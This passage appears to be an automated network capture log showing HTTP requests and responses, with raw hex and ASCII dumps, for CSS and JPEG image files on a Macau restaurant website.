                                                                                                                                                              Data Ascii: hover-en h3 {font-size: 18px;line-height: 18px;color: #fff;margin-bottom: 10px;padding-top: 1.5rem;}.list-no-hover img,.list-no-hover-en img {display: block;margin: 0 auto;width: 7%;}.list-hover {width: 100%;
                                                                                                                                                              Mar 13, 2023 05:26:06.460066080 CET689INData Raw: 6c 65 78 2d 62 6f 78 20 69 6d 67 20 7b 0d 0a 20 20 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 7d 0d 0a 20 20 2e 66 6c 65 78 2d 62 6f 78 20 2e 66 6c 65 78 2d 64 69 73 70 6c 61 79
                                                                                                                                                              Data Ascii: lex-box img { width: 100%; display: block; } .flex-box .flex-display { margin-right: 0; margin-bottom: 10px; } .flex-display div,.flex-sensior div { width: 100%; position: absolute; bottom: 50%; left
                                                                                                                                                              Mar 13, 2023 05:26:08.473751068 CET1039OUTGET /images/logo.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:08.697854996 CET1131INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 7862
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:24 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "9adbfff7a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:14 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 2b 01 68 03 01 11 00 02 11 01 03 11 01 ff c4 00 a9 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 00 03 04 05 06 07 02 01 08 01 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 10 00 02 01 03 03 02 03 06 05 02 05 01 09 00 00 00 01 02 03 04 05 06 00 11 12 21 07 31 91 13 41 51 71 22 32 14 61 b1 c1 15 08 81 52 d1 42 c2 23 16 62 72 92 d2 53 93 44 54 b4 55 11 00 01 03 02 04 04 04 04 05 03 03 05 01 00 00 00 01 00 11 02 03 04 21 31 12 05 41 51 13 06 61 71 91 22 81 a1 32 42 b1 d1 52 23 14 82 15 16 c1 e1 92 62 72 b2 c2 d2 24 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fb 71 b3 5a fe bc 29 69 c7 bb 7e 67 fd 43 5f 99 8e f7 57 84 47 cf f3 5c 3e a9 48 9c ca ea 77 da 2a 75 fc 02 37 ea c7 54 3b cd 7e 51 f4 3f 9a 8e a9 49 1c ba f0 7c 1a 25 f8 20 fd 75 53 bb dc 73 1e 89 d4 29 23 95 de 8e fb 54 aa ef ee 8d 3a 79 83 aa 1d d6 e3 f5 7c 82 8e a1 49 1c 9e f6 de 35 a7 a7 b9 23 1f 92 ea a7 73 b9 3f 7f c8 7e 49 ac ae 0e 45 79 27 73 5c ff 00 d0 28 fc 86 aa 77 1b 8f d6 7e 49 ac ae 0d fe f0 7a 9a f9 7f a1 db f2 1a a9 bf b8 3f 79 51 ac ae 0d f2 ec de 37 09 ff 00 a3 91 f9 6a 0d ed 73 f7 9f 54 d4 57 06 f1 75 6f 1b 8d 4f 4f 74 ac 3f 23 aa 9b ca e7 ef 97 a9 4d 47 9a e4 dd 6e 4d f5 5c 2a 5b e3 33 9f d7 50 6e ab 1f be 5e a5 35 15 c1 b8 d7 37 46 ac 9c 8f 71 91 bf c7 55 35 ea 9f b8 fa 95 1a 8a e7 ef ab 3f f9 53 7f ea 37 f8 ea 3a d5 3f 51 f5 28 e5 72 6b 2a 9b ea a8 95 b6 f7 bb 1f d7 50 6a cc fd c7 d5 1c af 3e ea a3 ff 00 3e 4f fb e7 4e a4 b9 94 75 e1 a9 9c 8d 8c d2 11 ee 2c 75 06 72 3c 4a 3a e7 d6 93 fb db cc ea 35 1e 68 8f 5a 4f ef 6f 33 a6 a3 cd 11 eb 49 fd ed e6 74 d4 79 a2 3d 69 3f bd bc ce 9a 8f 34 47 ad 27 f7 b7 99 d3 51 e6 8b a1 51 32 fd 32 ba fc 18 8d 48 9c 87 12 8e bd 15 75 20 ee 27 90 11 ed 0e 7f c7 53 d4 9f 33 ea 8e 94 15 f5 aa 77 15 73 83 ef 12 37 f8 ea c2 bd 41 f7 1f 52 8e 57 62 e9 71 5e ab 5f 52 a7 f0 95 c7 eb a9 17 35 87 df 2f 52 a7 51 4a 0b cd d4 0d 85 c6 a7 fa ca c7 f3 3a b8 bc ae 3e f9 7a 94 d4 79 a5 45 fe f0 3a 8a f9 7f a9 df f3 1a b0 bf b8 1f 79 4d 65 2a b9 25 e9 76 da b9 ba 7b d5 0f e6 ba b8 dc ae 07 df f8 7e 4a 75 94 aa e5 57 b1 e3 54 1b e3 1c 7f a2 8d 5c 6e b7 3f ab e4 3f 24 ea 14 b0 cb af 03 c5 a2 6f 8a 0f d3 6d 5c 6e f7 1c c7 a2 9e a1 4b 0c ce ea 3c 61 a6 6f 8a b7 e8 e3 57 1b d5 7e 51 f4 3f 9a 75 4a 59 73 6a ef f3 51 c0 7e 05 87 ea 75 71 bd d4 e3 11 f3 53 d5 29 75 cd e5 1f 5d b9 5b e1 21 1f e9 3a c8 37 c9 71 87 cf fd 94 f5 7c 12 cb 9c 46 76 e7 6e 65 f7 ed 28 3f e9 1a b8 df 07 18 7c ff 00 d9 3a be 09 75 cd a8 8f d7 47 3a fc 0a 9f d4 6a e3 7b a7 c6 27 e4 a7
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed+h!1AQq"2aRB#brSDTU!1AQaq"2BR#br$?qZ)i~gC_WG\>Hw*u7T;~Q?I|% uSs)#T:y|I5#s?~IEy's\(w~Iz?yQ7jsTWuoOOt?#MGnM\*[3Pn^57FqU5?S7:?Q(rk*Pj>>ONu,ur<J:5hZOo3Ity=i?4G'QQ22Hu 'S3ws7ARWbq^_R5/RQJ:>zyE:yMe*%v{~JuWT\n??$om\nK<aoW~Q?uJYsjQ~uqS)u][!:7q|Fvne(?|:uG:j{'
                                                                                                                                                              Mar 13, 2023 05:26:08.697904110 CET1133INData Raw: aa 12 eb 99 da 8f 8c 35 2b f1 54 fd 1f 59 06 f5 47 94 bd 07 e6 9d 50 97 5c ba cc 7c 64 95 7e 31 9f d3 7d 64 1b bd 03 c4 fa 29 ea 04 ba e5 16 36 ff 00 de f1 3e e3 1c 9f f8 75 71 ba 5b 9f bb e4 7f 25 3d 48 a5 d7 20 b3 3f 85 c2 31 f1 dd 7f 30 35 90
                                                                                                                                                              Data Ascii: 5+TYGP\|d~1}d)6>uq[%=H ?105n%j7:~:4kh)uWr.:YJR#D_?rZ-}9e%]S(nF""ooMv'rn+@q[6'86kfKdw
                                                                                                                                                              Mar 13, 2023 05:26:08.698007107 CET1134INData Raw: 7d 28 d4 05 3c 77 03 8f cb af 7d b5 88 d2 dc 37 19 e8 8c b4 03 21 12 03 7b 1d 86 58 72 c1 6d d3 c2 73 2c 91 c6 33 5a 4e ed da 33 3b 55 fb b7 54 98 ec 16 8b 25 4d c6 97 20 86 12 ab 04 d1 01 c4 73 68 d7 66 eb cb a3 75 0a c0 8d b5 36 f7 54 f7 ba 15
                                                                                                                                                              Data Ascii: }(<w}7!{Xrms,3ZN3;UT%M shfu6TWieg<@ 1l3Nm-WDS[qDC$RMMBFX3nyTtA 8&![@JS{+.AN"Atpx]'W\>35-x?{_6sijj
                                                                                                                                                              Mar 13, 2023 05:26:08.698127031 CET1135INData Raw: 6e 72 f6 c8 0c 80 5f 37 76 7b 1f 8b 25 cc 6d 51 56 2a 9b 4d 9d 1a eb 79 77 db 80 82 9b 66 01 f7 e9 b3 39 55 3f 81 3a f9 5f 6a 6d 62 fb 70 88 98 f6 43 df 2e 4d 1e 7e 65 81 f0 75 a1 6f 4f 54 f1 c8 2b 6f 78 22 b2 5e 68 71 4e e5 e2 f0 a4 56 0c a6 9d
                                                                                                                                                              Data Ascii: nr_7v{%mQV*Mywf9U?:_jmbpC.M~euoOT+ox"^hqNVH v`zY;juf0VKEJdpN,v s5=b=#rtNhR*Y2AsarNA\i9vY#EiyN@<;nq
                                                                                                                                                              Mar 13, 2023 05:26:08.698323965 CET1137INData Raw: 0e e7 ae da cb db b7 b3 ab 71 7f 75 46 38 e9 94 a3 83 e2 e4 c4 1f 12 d9 29 a3 27 33 90 52 18 a7 70 32 9e ff 00 e0 39 f6 23 57 22 5a b2 aa 08 62 ac b7 bd bd 5e 18 6b 29 bf cd 4d 2f 26 7d b9 32 95 3f 30 df 90 e9 b2 b6 fb 36 9b 9d cf 70 58 d7 b7 27
                                                                                                                                                              Data Ascii: quF8)'3Rp29#W"Zb^k)M/&}2?06pX'MPiH~,EZ3hSqob3k4;_o:2jNaCrsZfP%9qMHEjY]d~EDV%uX)>!]U{E^Qq?R945G\x
                                                                                                                                                              Mar 13, 2023 05:26:08.698386908 CET1138INData Raw: 9f f3 9a b8 ed 90 5a 4f c8 24 a1 68 e4 e3 cd 99 18 2a c8 04 87 a8 d9 87 1f 7e a7 b7 e3 0d 9b 6b 95 d5 6a 7a 8d 69 08 b7 fd 0c 73 c3 23 ee 3e 21 92 8b 52 a7 a8 8c d4 ae 2f 94 e3 5d ec c1 33 7c 0f 15 c1 ff 00 e1 ef 64 a4 4b 9d 96 9a 17 57 81 aa f9
                                                                                                                                                              Data Ascii: ZO$h*~kjzis#>!R/]3|dKW3(#@x1kF}iFOHWgpEX1J>bX->hE!6RKm tz3pMeCO7*F!on[4#}AyY
                                                                                                                                                              Mar 13, 2023 05:26:08.932215929 CET1212OUTGET /images/menu02.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:09.137172937 CET1235INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 1252
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "d2771cf8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:14 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 3e 03 01 11 00 02 11 01 03 11 01 ff c4 00 88 00 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 04 05 03 06 07 01 02 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 08 10 00 02 02 01 04 02 02 00 05 05 01 00 00 00 00 00 01 02 03 04 05 00 11 12 06 21 22 31 14 41 51 32 13 07 61 81 42 53 16 17 11 00 01 03 02 03 06 04 07 01 00 00 00 00 00 00 00 01 00 11 02 31 03 21 41 12 51 61 71 b1 22 04 81 91 d1 13 f0 a1 c1 32 52 82 14 23 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ef bc f5 f2 ca f0 14 8f af 68 d5 37 85 69 7e 92 ca 20 37 38 37 ed 09 4a 96 11 f3 db 8f 22 a0 9d b7 df 6d 1b 07 56 d2 59 f2 51 f9 e8 aa 9c f4 44 e7 a2 27 3d 11 39 e8 89 cf 44 5d db f8 e6 9a 62 f0 14 64 b6 d4 12 b7 7b bd 2d 1c bf dc b9 52 ac 83 12 91 bd 62 f1 25 99 63 67 de 79 4b 7a 02 77 8c 7f 4d 76 5a 8b 0e 3c 97 a9 da 47 4c 03 b7 51 62 e4 0e 9a 67 bf 92 a4 5a 18 dc 17 47 ec 18 be d1 5e f5 86 c5 f6 f4 ab f5 e8 cb 1d 77 69 a3 ad 2a 12 64 96 39 80 5e 20 b0 d9 0e fe 07 80 77 d5 74 88 c0 83 b5 67 a2 30 b5 28 cd f0 96 5c 3c 54 6c d7 49 c0 f5 8f fa 4b f9 39 ef e4 f1 b8 dc 85 3a 18 9a 75 64 8e b4 f2 1b b5 7e e2 b4 f3 3c 53 2a 70 8b 60 40 43 c9 bf 21 a8 95 a1 17 25 45 ce da 16 f5 12 e4 02 00 ca a1 f1 aa c7 9e e8 b8 9c 5e 27 b2 e5 aa 5c b7 34 54 ab e0 ae e1 52 62 8a e2 0c ba 4a ec 96 54 27 97 4e 00 0e 24 7e 7b 7e 01 2b 40 02 78 7c d4 5d ed a3 18 ca 40 9c 34 91 fb 6d 57 f5 7a df 54 c2 0e d7 5a e6 3a de 58 47 d4 29 65 92 57 9e 04 78 de cb 56 69 04 25 aa c9 c1 b9 49 b2 bf 9d 97 75 20 ef b8 b0 b7 18 bf 05 ac 6c db 86 a0 41 3d 20 e5 9b 6e 5a 77 f1 a9 59 3b 2d f5 81 58 2c 98 5c c0 86 36 21 9b 63 4a 6e 20 90 17 73 fd 86 a9 64 75 78 15 cf da 7d e7 81 e4 56 5e b2 22 6f e3 ee fa 2c 48 60 af 2e 43 03 1b d8 e2 5b 88 fd cb 25 88 03 e4 a8 f3 b6 90 1d 12 f0 53 64 7f 8c df 6c 7e aa 6d de a5 d7 6b e6 f0 b1 05 b1 0f 54 bf 3d 88 df b5 36 5a a4 d5 e6 8a 34 e4 1d 19 2a 81 0c 88 3d 8c 2f c9 db c2 0d 89 0d a9 36 e2 e3 66 d7 56 95 88 09 0f c4 e6 e3 d3 0e 15 c9 73 2c 86 67 23 95 4c 7c 77 ec fe fc 78 aa a9 4b 1f 18 44 41 1c 08 59 82 80 8a bb f9 62 49 3e 4f e2 75 99 24 d5 72 ca 66 4c f9 06 5b 2f fe 8f db cb de 69 72 50 d8 19 29 a2 b3 7e 2b 14 a9 cd 1c b3 43 1a c7 1c 8f 1c 90 b2 96 55 41 e7 6f 9f 6f d5 e7 57 f7 64 b6 fe ab 98 e3 5d c3 d1 42 87 bb f6 58 67 cb 58 6c 88 b8 d9 d9 16 6c bc 57 a0 82 e4 33 c8 87 74 67 86 c4 72 47 ba ff 00 89 0b e3 e0 6a 3d c9 63 bd 50 77 13 04 97 ad 5d 8f 35 ec 5d e3 b3 45 77 27 90 39 25 b3 63 30 a8 99 35 b7 5e 0b 50 cc b1 10 63 0d 04 f1 bc 7b 26 c3 8e cb eb f8 6d a7 b9 27 75 23 b8 98 24 bd 6b
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed>!"1AQ2aBS1!AQaq"2R#?h7i~ 787J"mVYQD'=9D]bd{-Rb%cgyKzwMvZ<GLQbgZG^wi*d9^ wtg0(\<TlIK9:ud~<S*p`@C!%E^'\4TRbJT'N$~{~+@x|]@4mWzTZ:XG)eWxVi%Iu lA= nZwY;-X,\6!cJn sdux}V^"o,H`.C[%Sdl~mkT=6Z4*=/6fVs,g#L|wxKDAYbI>Ou$rfL[/irP)~+CUAooWd]BXgXllW3tgrGj=cPw]5]Ew'9%c05^Pc{&m'u#$k
                                                                                                                                                              Mar 13, 2023 05:26:09.176315069 CET1238OUTGET /images/indexpic01.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:09.387393951 CET1311INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 96268
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:24 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "e4dfa2f7a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:14 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 23 f4 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 00 a0 00 00 01 01 00 03 00 00 00 01 01 5e 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d2 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 35 3a 32 38 20 31 31 3a 33 34 3a 30 31 00 00 00 00 04 90 00 00 07 00 00 00 04 30 32 32 31 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 00 a0 a0 03 00 04 00 00 00 01 00 00 01 5e 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 6e 01 1b 00 05 00 00 00 01 00 00 01 76 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 7e 02 02 00 04 00 00 00 01 00 00 22 6e 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f
                                                                                                                                                              Data Ascii: #ExifMM*^(12i ''Adobe Photoshop CS6 (Windows)2020:05:28 11:34:010221^nv(~"nHHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http:/
                                                                                                                                                              Mar 13, 2023 05:26:13.978533030 CET2235OUTGET /images/indexpic01.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
                                                                                                                                                              Mar 13, 2023 05:26:14.184592962 CET2252INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 96268
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:24 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "e4dfa2f7a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:20 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 23 f4 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 00 a0 00 00 01 01 00 03 00 00 00 01 01 5e 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d2 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 35 3a 32 38 20 31 31 3a 33 34 3a 30 31 00 00 00 00 04 90 00 00 07 00 00 00 04 30 32 32 31 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 00 a0 a0 03 00 04 00 00 00 01 00 00 01 5e 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 6e 01 1b 00 05 00 00 00 01 00 00 01 76 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 7e 02 02 00 04 00 00 00 01 00 00 22 6e 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 